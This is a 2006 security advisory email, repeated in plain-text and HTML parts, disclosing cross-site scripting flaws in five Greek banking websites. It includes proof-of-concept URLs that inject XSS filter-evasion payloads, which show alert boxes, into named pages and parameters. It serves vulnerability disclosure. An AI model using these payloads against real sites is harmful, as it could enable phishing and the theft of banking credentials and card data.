This is a multi-part message in MIME format.

------=_NextPart_000_000B_01C6DC9B.6E911000
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@sentinel.gr


General Flaw Description : Cross Site Scripting Vulnerabilities in =
multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------=
------
                             Advisory Information
-------------------------------------------------------------------------=
------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------=
------
                             Product Information
-------------------------------------------------------------------------=
------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------=
------
                          Vulnerability Information
-------------------------------------------------------------------------=
------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phising and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil@sentinel.gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------=
------


Description
-----------

Many Greek banks are using Web Banking service to assist their customers =
with=20
their transactions. Eurobank, Winbank, Pireaus Bank, Probank and =
Emporiki Bank=20
found to be vulnerable to Cross Site Scripting Attacks which can lead to =

execution of arbitrary SCRIPT and HTML code to the user.=20


Technical Information
---------------------

www.eurobank.gr is making use of multiple aspx files which fail to =
sanitise
variables. Most of aspx files in Eurobank website which are getting =
variables
as input are vulnerable to XSS.

www.winbank.gr is using a search function which does not properly =
sanitise the
input of variable text_search.

www.emporiki.gr is using a jsp search function which does not properly =
sanitise
the input of variable searchFld.

www.piraeusbank.gr is having exactly the same problem with Winbank as it =
is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site =
Scripting
is possible, and thus the danger is the same, as an unsuspicious user =
can be
lead from www.piraeusbank.gr with a valid redirection to a fake =
www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service but the site is =
vulnerable
to XSS and while account compromise is not possible, valuable =
information such
as CARD and PIN numbers can be stolen through phising/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(=
88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fro=
mCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/S=
CRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D=
&{}

http://www.winbank.gr/eCPage.asp?Page=3DeCFullSearchResults.asp&lang=3D1&=
text_search=3D%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=3D';alert(Strin=
g.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;a=
lert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83=
,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83)=
)%3C/SCRIPT%3E=3D&{}

http://www.piraeusbank.gr/ecportal.asp?id=3D235212&nt=3D107&pageno=3D1&fr=
omsearch=3D234010&lang=3D2&tid=3D&txtSearch=3D%3Cscript%3Ealert('XSS')%3C=
/script%3E

http://www.probank.gr/search/index.php?qu=3D';alert(String.fromCharCode(8=
8,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.from=
CharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SC=
RIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D=
&{}


Patch Description and Information
---------------------------------

Banks informed. All banks except Emporiki Bank have fixed the =
vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.

------=_NextPart_000_000B_01C6DC9B.6E911000
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2963" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial><PRE>                      Sentinel Computer =
Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@sentinel.gr


General Flaw Description : Cross Site Scripting Vulnerabilities in =
multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------=
------
                             Advisory Information
-------------------------------------------------------------------------=
------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------=
------
                             Product Information
-------------------------------------------------------------------------=
------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------=
------
                          Vulnerability Information
-------------------------------------------------------------------------=
------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phising and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil@sentinel.gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------=
------


Description
-----------

Many Greek banks are using Web Banking service to assist their customers =
with=20
their transactions. Eurobank, Winbank, Pireaus Bank, Probank and =
Emporiki Bank=20
found to be vulnerable to Cross Site Scripting Attacks which can lead to =

execution of arbitrary SCRIPT and HTML code to the user.=20


Technical Information
---------------------

www.eurobank.gr is making use of multiple aspx files which fail to =
sanitise
variables. Most of aspx files in Eurobank website which are getting =
variables
as input are vulnerable to XSS.

www.winbank.gr is using a search function which does not properly =
sanitise the
input of variable text_search.

www.emporiki.gr is using a jsp search function which does not properly =
sanitise
the input of variable searchFld.

www.piraeusbank.gr is having exactly the same problem with Winbank as it =
is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site =
Scripting
is possible, and thus the danger is the same, as an unsuspicious user =
can be
lead from www.piraeusbank.gr with a valid redirection to a fake =
www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service but the site is =
vulnerable
to XSS and while account compromise is not possible, valuable =
information such
as CARD and PIN numbers can be stolen through phising/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(=
88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fro=
mCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/S=
CRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D=
&amp;{}

http://www.winbank.gr/eCPage.asp?Page=3DeCFullSearchResults.asp&amp;lang=3D=
1&amp;text_search=3D%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=3D';alert(Strin=
g.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;a=
lert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83=
,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83)=
)%3C/SCRIPT%3E=3D&amp;{}

http://www.piraeusbank.gr/ecportal.asp?id=3D235212&amp;nt=3D107&amp;pagen=
o=3D1&amp;fromsearch=3D234010&amp;lang=3D2&amp;tid=3D&amp;txtSearch=3D%3C=
script%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=3D';alert(String.fromCharCode(8=
8,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.from=
CharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SC=
RIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D=
&amp;{}


Patch Description and Information
---------------------------------

Banks informed. All banks except Emporiki Bank have fixed the =
vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.
</PRE></FONT></DIV></BODY></HTML>

------=_NextPart_000_000B_01C6DC9B.6E911000--